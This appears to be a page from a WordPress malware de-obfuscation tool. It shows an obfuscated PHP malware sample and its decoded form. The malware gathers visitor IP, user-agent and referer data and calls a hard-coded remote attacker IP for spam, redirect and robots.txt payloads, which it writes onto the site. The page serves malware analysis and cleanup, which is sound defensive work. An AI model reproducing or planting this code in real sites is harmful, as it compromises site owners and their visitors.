De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; $oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoooOOoOO = $_SERVER["REQUEST_URI"]; $ooOOoooOOoOO = $_SERVER["HTTP_HOST"]; $ooOOOoooOOoOO = $_SERVER["PHP_SELF"]; $ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"]; $ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO; $oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php"; $ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php"; $ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php"; $oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php"; $ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php"; $ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $ooooooOoOoooOOOooo["http_user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"]; $ooooooOoOoooOOOooo["ip"] = $_SERVER["REMOTE_ADDR"]; $ooooooOoOoooOOOooo["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ooooooOoOoooOOOooo[] = array(); $ooooooOoOoooOOOooo[$O[12] . $O[8] . $O[25] . $O[10] . $O[7] . $O[24]] = $ooOOoooOOoOO; $ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[0] . $O[52] . $O[6] . $O[3] . $O[7]] = $oOoooOOoOO; $ooooooOoOoooOOOooo[$O[15] . $O[3] . $O[2] . $O[13]] = $ooooooOOoooOOOoooOo; $ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[0] . $O[52] . $O[6] . $O[3] . $O[18]] = $ooOOOOoooOOOOoOO; if (substr($oOoooOOoOO, 6) == $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11]) { $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($ooooooooOOOOoooOOoooOO, $ooooooOoOoooOOOooo); define('BASE_PATH', str_ireplace($_SERVER[$O[35] . $O[41] . $O[35] . $O[52] . $O[37] . $O[28] . $O[44] . $O[39]], '', "/var/www/html/input.php")); file_put_contents(BASE_PATH . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4], $ooooooooOOOOOoooOoOoooOO); $ooooooooOOOOOoooOoOoooOO = file_get_contents(BASE_PATH . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4]); if (strpos($ooooooooOOOOOoooOoOoooOO, $O[59] . $O[20] . $O[25] . $O[18])) { echo $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4] . $O[57] . $O[13] . $O[7] . $O[18] . $O[2] . $O[57] . $O[21] . $O[3] . $O[2] . $O[10] . $O[4] . $O[2] . $O[57] . $O[11] . $O[6] . $O[21] . $O[21] . $O[2] . $O[11] . $O[11] . $O[88]; } else { echo $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4] . $O[57] . $O[13] . $O[7] . $O[18] . $O[2] . $O[57] . $O[21] . $O[3] . $O[2] . $O[10] . $O[4] . $O[2] . $O[57] . $O[13] . $O[10] . $O[7] . $O[18] . $O[88]; } exit; } ?>
<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; $oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoooOOoOO = $_SERVER["REQUEST_URI"]; $ooOOoooOOoOO = $_SERVER["HTTP_HOST"]; $ooOOOoooOOoOO = $_SERVER["PHP_SELF"]; $ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"]; $ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO; $oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php"; $ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php"; $ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php"; $oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php"; $ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php"; $ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $ooooooOoOoooOOOooo["http_user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"]; $ooooooOoOoooOOOooo["ip"] = $_SERVER["REMOTE_ADDR"]; $ooooooOoOoooOOOooo["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ooooooOoOoooOOOooo[] = array(); $ooooooOoOoooOOOooo["domain"] = $ooOOoooOOoOO; $ooooooOoOoooOOOooo["req_uri"] = $oOoooOOoOO; $ooooooOoOoooOOOooo["href"] = $ooooooOOoooOOOoooOo; $ooooooOoOoooOOOooo["req_url"] = $ooOOOOoooOOOOoOO; if (substr($oOoooOOoOO, 6) == "robots") { $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($ooooooooOOOOoooOOoooOO, $ooooooOoOoooOOOooo); define('BASE_PATH', str_ireplace($_SERVER["PHP_SELF"], '', "/var/www/html/input.php")); file_put_contents("BASE_PATH/robots.txt", $ooooooooOOOOOoooOoOoooOO); $ooooooooOOOOOoooOoOoooOO = file_get_contents("BASE_PATH/robots.txt"); if (strpos($ooooooooOOOOOoooOoOoooOO, ".xml")) { echo "robots.txt file create success!"; } else { echo "robots.txt file create fail!"; } exit; }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.